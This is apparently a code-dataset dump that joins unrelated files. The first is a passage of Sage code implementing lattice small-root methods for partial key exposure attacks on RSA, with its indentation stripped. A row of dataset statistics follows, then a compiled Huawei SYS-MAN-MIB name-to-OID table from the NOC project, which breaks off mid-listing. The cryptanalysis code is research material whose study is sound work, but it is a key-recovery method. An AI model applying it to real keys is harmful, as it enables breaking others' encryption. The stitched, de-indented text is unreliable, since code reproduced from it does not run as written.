f_ = (pow(R, -1, n) * f % n).change_ring(ZZ)
logging.debug("Generating shifts...")
shifts = set()
monomials = set()
for i in range(m + 1):
for j in range(m - i + 1):
for k in range(j + 1):
g = x ** i * y ** j * z ** k * f_ * X ** (m - i) * Y ** (m - j) * Z ** (m + t - k)
shifts.add(g)
monomials.update(g.monomials())
for k in range(j + 1, j + t + 1):
h = x ** i * y ** j * z ** k * f_ * X ** (m - i) * Y ** (m - j) * Z ** (m + t - k)
shifts.add(h)
monomials.update(h.monomials())
for i in range(m + 2):
j = m + 1 - i
for k in range(j + 1):
g_ = n * x ** i * y ** j * z ** k
shifts.add(g_)
monomials.update(g_.monomials())
for k in range(j + 1, j + t + 1):
h_ = n * x ** i * y ** j * z ** k
shifts.add(h_)
monomials.update(h_.monomials())
L = small_roots.fill_lattice(shifts, monomials, [X, Y, Z])
L = small_roots.reduce(L)
polynomials = small_roots.reconstruct_polynomials(L, monomials, [X, Y, Z])
for roots in small_roots.find_roots(f, polynomials, pr, method=roots_method):
yield roots[x], roots[y], roots[z]
def integer_trivariate_2(f, m, t, W, X, Y, Z, check_bounds=True, roots_method="resultants"):
"""
Computes small integer roots of a trivariate polynomial.
More information: Ernst M. et al., "Partial Key Exposure Attacks on RSA Up to Full Size Exponents" (Section 4.1.2)
:param f: the polynomial
:param m: the parameter m
:param t: the parameter t
:param W: the parameter W
:param X: an approximate bound on the x roots
:param Y: an approximate bound on the y roots
:param Z: an approximate bound on the z roots
:param check_bounds: whether or not we should check bounds (default: True)
:param roots_method: the method to use to find roots (default: "resultants")
    :return: a generator yielding small roots (tuples of x, y, and z roots) of the polynomial
"""
pr = f.parent()
x, y, z = pr.gens()
tau = t / m
if check_bounds and RR(X) ** (2 + 3 * tau) * RR(Y) ** (3 + 6 * tau + 3 * tau ** 2) * RR(Z) ** (3 + 3 * tau) > RR(W) ** (2 + 3 * tau):
logging.debug(f"Bound check failed for m = {m}, t = {t}")
return
R = f.constant_coefficient()
while gcd(R, X) != 1:
X += 1
while gcd(R, Y) != 1:
Y += 1
while gcd(R, Z) != 1:
Z += 1
while gcd(R, W) != 1:
W += 1
n = X ** m * Y ** (m + t) * Z ** m * W
assert gcd(R, n) == 1
f_ = (pow(R, -1, n) * f % n).change_ring(ZZ)
logging.debug("Generating shifts...")
shifts = set()
monomials = set()
for i in range(m + 1):
for j in range(m - i + 1):
for k in range(m - i + 1):
g = x ** i * y ** j * z ** k * f_ * X ** (m - i) * Y ** (m + t - j) * Z ** (m - k)
shifts.add(g)
monomials.update(g.monomials())
for j in range(m - i + 1, m - i + t + 1):
for k in range(m - i + 1):
h = x ** i * y ** j * z ** k * f_ * X ** (m - i) * Y ** (m + t - j) * Z ** (m - k)
shifts.add(h)
monomials.update(h.monomials())
for i in range(m + 2):
for j in range(m + t + 2 - i):
k = m + 1 - i
g_ = n * x ** i * y ** j * z ** k
shifts.add(g_)
monomials.update(g_.monomials())
for i in range(m + 1):
j = m + t + 1 - i
for k in range(m - i + 1):
h_ = n * x ** i * y ** j * z ** k
shifts.add(h_)
monomials.update(h_.monomials())
L = small_roots.fill_lattice(shifts, monomials, [X, Y, Z])
L = small_roots.reduce(L)
polynomials = small_roots.reconstruct_polynomials(L, monomials, [X, Y, Z])
for roots in small_roots.find_roots(f, polynomials, pr, method=roots_method):
yield roots[x], roots[y], roots[z]
| 35.606452 | 137 | 0.517304 | 887 | 5,519 | 3.158963 | 0.121759 | 0.039971 | 0.034261 | 0.01142 | 0.927195 | 0.915774 | 0.910778 | 0.901856 | 0.891506 | 0.881156 | 0 | 0.019068 | 0.334843 | 5,519 | 154 | 138 | 35.837662 | 0.744211 | 0.236456 | 0 | 0.803922 | 0 | 0 | 0.0337 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 1 | 0.019608 | false | 0 | 0.04902 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
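Both functions in ernst.py nudge the bounds X, Y, Z, W upward until each is coprime to the constant coefficient R, so that R is invertible modulo n (the `pow(R, -1, n)` step). That loop in isolation, as plain Python with no Sage dependency:

```python
from math import gcd

def make_coprime(R, bound):
    # Increment the bound until gcd(R, bound) == 1, mirroring the
    # `while gcd(R, X) != 1: X += 1` loops above.
    while gcd(R, bound) != 1:
        bound += 1
    return bound

assert make_coprime(6, 4) == 5  # 4 shares factor 2 with 6; 5 is coprime
assert make_coprime(6, 5) == 5  # already coprime, unchanged
```

Since the bounds are only approximate anyway, bumping them by a few units does not affect correctness of the lattice construction.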
f7eb7ee4ef38ed4e24c1a5777d71fc1dd5efd3e7 | 20,785 | py | Python | cmibs/huawei_sys_man_mib.py | xUndero/noc | 9fb34627721149fcf7064860bd63887e38849131 | [
"BSD-3-Clause"
] | 1 | 2019-09-20T09:36:48.000Z | 2019-09-20T09:36:48.000Z | cmibs/huawei_sys_man_mib.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | cmibs/huawei_sys_man_mib.py | ewwwcha/noc | aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# HUAWEI-SYS-MAN-MIB
# Compiled MIB
# Do not modify this file directly
# Run ./noc make-cmib instead
# ----------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# MIB Name
NAME = "HUAWEI-SYS-MAN-MIB"
# Metadata
LAST_UPDATED = "2002-12-20"
COMPILED = "2019-03-03"
# MIB Data: name -> oid
MIB = {
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIB": "1.3.6.1.4.1.2011.5.25.19",
"HUAWEI-SYS-MAN-MIB::huaweiSystemManMIBObjects": "1.3.6.1.4.1.2011.5.25.19.1",
"HUAWEI-SYS-MAN-MIB::hwSysClock": "1.3.6.1.4.1.2011.5.25.19.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysLocalClock": "1.3.6.1.4.1.2011.5.25.19.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysCurrent": "1.3.6.1.4.1.2011.5.25.19.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysCurTable": "1.3.6.1.4.1.2011.5.25.19.1.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysCurEntry": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysCurEntPhysicalIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysCurCFGFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysCurImageIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysCurPafFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysCurLicenseIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysCurPatchFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.6",
"HUAWEI-SYS-MAN-MIB::hwSysCurVoiceFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.2.1.1.7",
"HUAWEI-SYS-MAN-MIB::hwSysReload": "1.3.6.1.4.1.2011.5.25.19.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysReloadSchedule": "1.3.6.1.4.1.2011.5.25.19.1.3.1",
"HUAWEI-SYS-MAN-MIB::hwSysReloadAction": "1.3.6.1.4.1.2011.5.25.19.1.3.2",
"HUAWEI-SYS-MAN-MIB::hwSysReloadScheduleTable": "1.3.6.1.4.1.2011.5.25.19.1.3.3",
"HUAWEI-SYS-MAN-MIB::hwSysReloadScheduleEntry": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1",
"HUAWEI-SYS-MAN-MIB::hwSysReloadScheduleIndex": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysReloadEntity": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysReloadCfgFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysReloadImage": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysReloadReason": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysReloadScheduleTime": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.6",
"HUAWEI-SYS-MAN-MIB::hwSysReloadRowStatus": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.7",
"HUAWEI-SYS-MAN-MIB::hwSysReloadPafFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.8",
"HUAWEI-SYS-MAN-MIB::hwSysReloadLicenseFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.9",
"HUAWEI-SYS-MAN-MIB::hwSysReloadPatchFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.10",
"HUAWEI-SYS-MAN-MIB::hwSysReloadPatchState": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.11",
"HUAWEI-SYS-MAN-MIB::hwSysReloadOperateDestType": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.12",
"HUAWEI-SYS-MAN-MIB::hwSysReloadOperateDestIndex": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.13",
"HUAWEI-SYS-MAN-MIB::hwSysReloadVoiceFile": "1.3.6.1.4.1.2011.5.25.19.1.3.3.1.14",
"HUAWEI-SYS-MAN-MIB::hwSysReboot": "1.3.6.1.4.1.2011.5.25.19.1.3.4",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchEnable": "1.3.6.1.4.1.2011.5.25.19.1.3.5",
"HUAWEI-SYS-MAN-MIB::hwSysLatestRebootErrorInfo": "1.3.6.1.4.1.2011.5.25.19.1.3.6",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchTable": "1.3.6.1.4.1.2011.5.25.19.1.3.7",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchEntry": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchIndex": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchChassisNum": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchOperType": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysSlaveSwitchEnableStatus": "1.3.6.1.4.1.2011.5.25.19.1.3.7.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysDelayReboot": "1.3.6.1.4.1.2011.5.25.19.1.3.8",
"HUAWEI-SYS-MAN-MIB::hwSysImage": "1.3.6.1.4.1.2011.5.25.19.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysImageNum": "1.3.6.1.4.1.2011.5.25.19.1.4.1",
"HUAWEI-SYS-MAN-MIB::hwSysImageTable": "1.3.6.1.4.1.2011.5.25.19.1.4.2",
"HUAWEI-SYS-MAN-MIB::hwSysImageEntry": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysImageIndex": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysImageName": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysImageSize": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysImageLocation": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysImageVersion": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysImageReason": "1.3.6.1.4.1.2011.5.25.19.1.4.2.1.6",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFile": "1.3.6.1.4.1.2011.5.25.19.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileNum": "1.3.6.1.4.1.2011.5.25.19.1.5.1",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileTable": "1.3.6.1.4.1.2011.5.25.19.1.5.2",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileName": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileSize": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysCFGFileReason": "1.3.6.1.4.1.2011.5.25.19.1.5.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysPafFile": "1.3.6.1.4.1.2011.5.25.19.1.6",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileNum": "1.3.6.1.4.1.2011.5.25.19.1.6.1",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileTable": "1.3.6.1.4.1.2011.5.25.19.1.6.2",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileName": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileSize": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwSysPafFileVersion": "1.3.6.1.4.1.2011.5.25.19.1.6.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFile": "1.3.6.1.4.1.2011.5.25.19.1.7",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileNum": "1.3.6.1.4.1.2011.5.25.19.1.7.1",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileTable": "1.3.6.1.4.1.2011.5.25.19.1.7.2",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileName": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileSize": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysLicenseFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.7.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatch": "1.3.6.1.4.1.2011.5.25.19.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchBase": "1.3.6.1.4.1.2011.5.25.19.1.8.1",
"HUAWEI-SYS-MAN-MIB::hwPatchFileNum": "1.3.6.1.4.1.2011.5.25.19.1.8.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchRecordReset": "1.3.6.1.4.1.2011.5.25.19.1.8.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryTableMax": "1.3.6.1.4.1.2011.5.25.19.1.8.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchTrapEnble": "1.3.6.1.4.1.2011.5.25.19.1.8.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorTableMax": "1.3.6.1.4.1.2011.5.25.19.1.8.1.5",
"HUAWEI-SYS-MAN-MIB::hwPatchId": "1.3.6.1.4.1.2011.5.25.19.1.8.1.6",
"HUAWEI-SYS-MAN-MIB::hwPatchLatestId": "1.3.6.1.4.1.2011.5.25.19.1.8.1.7",
"HUAWEI-SYS-MAN-MIB::hwPatchFailReason": "1.3.6.1.4.1.2011.5.25.19.1.8.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchFileTable": "1.3.6.1.4.1.2011.5.25.19.1.8.2",
"HUAWEI-SYS-MAN-MIB::hwPatchFileEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1",
"HUAWEI-SYS-MAN-MIB::hwPatchFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchFileName": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchFileSize": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchFileLocation": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchFileVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwLoadPatchTable": "1.3.6.1.4.1.2011.5.25.19.1.8.4",
"HUAWEI-SYS-MAN-MIB::hwLoadPatchEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1",
"HUAWEI-SYS-MAN-MIB::hwPatchLoadDestType": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchLoadDestIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchLoadState": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1.3",
"HUAWEI-SYS-MAN-MIB::hwLoadPatchRowState": "1.3.6.1.4.1.2011.5.25.19.1.8.4.1.51",
"HUAWEI-SYS-MAN-MIB::hwPatchInfo": "1.3.6.1.4.1.2011.5.25.19.1.8.5",
"HUAWEI-SYS-MAN-MIB::hwPatchTable": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1",
"HUAWEI-SYS-MAN-MIB::hwPatchEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchSlotIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchUsedFileName": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchDescription": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.5",
"HUAWEI-SYS-MAN-MIB::hwPatchProgramVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.6",
"HUAWEI-SYS-MAN-MIB::hwPatchFuncNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.7",
"HUAWEI-SYS-MAN-MIB::hwPatchTextLen": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchDataLen": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.9",
"HUAWEI-SYS-MAN-MIB::hwPatchType": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.10",
"HUAWEI-SYS-MAN-MIB::hwPatchBuildTime": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.11",
"HUAWEI-SYS-MAN-MIB::hwPatchActiveTime": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.12",
"HUAWEI-SYS-MAN-MIB::hwPatchAdminStatus": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.13",
"HUAWEI-SYS-MAN-MIB::hwPatchOperateState": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.14",
"HUAWEI-SYS-MAN-MIB::hwPatchOperateDestType": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.15",
"HUAWEI-SYS-MAN-MIB::hwPatchOperateDestIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.1.1.16",
"HUAWEI-SYS-MAN-MIB::hwPatchStateTable": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2",
"HUAWEI-SYS-MAN-MIB::hwPatchStateEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1",
"HUAWEI-SYS-MAN-MIB::hwPatchNumMax": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchIdleNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchTextMax": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchDataMax": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchStateTextUsed": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.5",
"HUAWEI-SYS-MAN-MIB::hwPatchStateDataUsed": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.6",
"HUAWEI-SYS-MAN-MIB::hwPatchStateTotalPatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.7",
"HUAWEI-SYS-MAN-MIB::hwPatchStateTempPatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchStateCommonPatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.9",
"HUAWEI-SYS-MAN-MIB::hwPatchStateRuningPatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.10",
"HUAWEI-SYS-MAN-MIB::hwPatchStateActivePatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.11",
"HUAWEI-SYS-MAN-MIB::hwPatchStateDeactivePatchNum": "1.3.6.1.4.1.2011.5.25.19.1.8.5.2.1.12",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryTable": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryProgrameVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryVersion": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.3",
"HUAWEI-SYS-MAN-MIB::hwSlotId": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.4",
"HUAWEI-SYS-MAN-MIB::hwPacthBeginIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.5",
"HUAWEI-SYS-MAN-MIB::hwPatchEndIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.6",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryAction": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.7",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryBeginTime": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.8",
"HUAWEI-SYS-MAN-MIB::hwPatchHistoryEndTime": "1.3.6.1.4.1.2011.5.25.19.1.8.5.3.1.9",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorTable": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorEntry": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.1",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorSlot": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.2",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorPatchFileName": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.3",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorPatchIndex": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.4",
"HUAWEI-SYS-MAN-MIB::hwPatchErrorCode": "1.3.6.1.4.1.2011.5.25.19.1.8.5.4.1.5",
"HUAWEI-SYS-MAN-MIB::hwBootRom": "1.3.6.1.4.1.2011.5.25.19.1.11",
"HUAWEI-SYS-MAN-MIB::hwBootRomTable": "1.3.6.1.4.1.2011.5.25.19.1.11.1",
"HUAWEI-SYS-MAN-MIB::hwBootRomEntry": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1",
"HUAWEI-SYS-MAN-MIB::hwBootRomIndex": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwBootRomBootDevice": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwBootRomProcessorNo": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwBootRomHostName": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwBootRomFileName": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.5",
"HUAWEI-SYS-MAN-MIB::hwBootRomIpOnEthernet": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.6",
"HUAWEI-SYS-MAN-MIB::hwBootRomIpOnBackPlane": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.7",
"HUAWEI-SYS-MAN-MIB::hwBootRomHostIp": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.8",
"HUAWEI-SYS-MAN-MIB::hwBootRomGatewayIp": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.9",
"HUAWEI-SYS-MAN-MIB::hwBootRomUserName": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.10",
"HUAWEI-SYS-MAN-MIB::hwBootRomPassword": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.11",
"HUAWEI-SYS-MAN-MIB::hwBootRomTargetName": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.12",
"HUAWEI-SYS-MAN-MIB::hwBootRomStartupScript": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.13",
"HUAWEI-SYS-MAN-MIB::hwBootRomXModemBaudRate": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.14",
"HUAWEI-SYS-MAN-MIB::hwBootRomVersion": "1.3.6.1.4.1.2011.5.25.19.1.11.1.1.15",
"HUAWEI-SYS-MAN-MIB::hwSysUpgrade": "1.3.6.1.4.1.2011.5.25.19.1.12",
"HUAWEI-SYS-MAN-MIB::hwSysUpgradeTable": "1.3.6.1.4.1.2011.5.25.19.1.12.1",
"HUAWEI-SYS-MAN-MIB::hwSysUpgradeEntry": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1",
"HUAWEI-SYS-MAN-MIB::hwIssuIndex": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwIssuMode": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwIssuImageFile": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwIssuPafFile": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.4",
"HUAWEI-SYS-MAN-MIB::hwIssuLicenseFile": "1.3.6.1.4.1.2011.5.25.19.1.12.1.1.5",
"HUAWEI-SYS-MAN-MIB::hwIssuState": "1.3.6.1.4.1.2011.5.25.19.1.12.2",
"HUAWEI-SYS-MAN-MIB::hwIssuConditionCheck": "1.3.6.1.4.1.2011.5.25.19.1.12.3",
"HUAWEI-SYS-MAN-MIB::hwSysSourceIndex": "1.3.6.1.4.1.2011.5.25.19.1.13",
"HUAWEI-SYS-MAN-MIB::hwSysSourceIndexTable": "1.3.6.1.4.1.2011.5.25.19.1.13.1",
"HUAWEI-SYS-MAN-MIB::hwSysSourceIndexEntry": "1.3.6.1.4.1.2011.5.25.19.1.13.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysFileType": "1.3.6.1.4.1.2011.5.25.19.1.13.1.1.1",
"HUAWEI-SYS-MAN-MIB::hwSysFileName": "1.3.6.1.4.1.2011.5.25.19.1.13.1.1.2",
"HUAWEI-SYS-MAN-MIB::hwSysFileIndex": "1.3.6.1.4.1.2011.5.25.19.1.13.1.1.3",
"HUAWEI-SYS-MAN-MIB::hwSysRebootInfo": "1.3.6.1.4.1.2011.5.25.19.1.14",
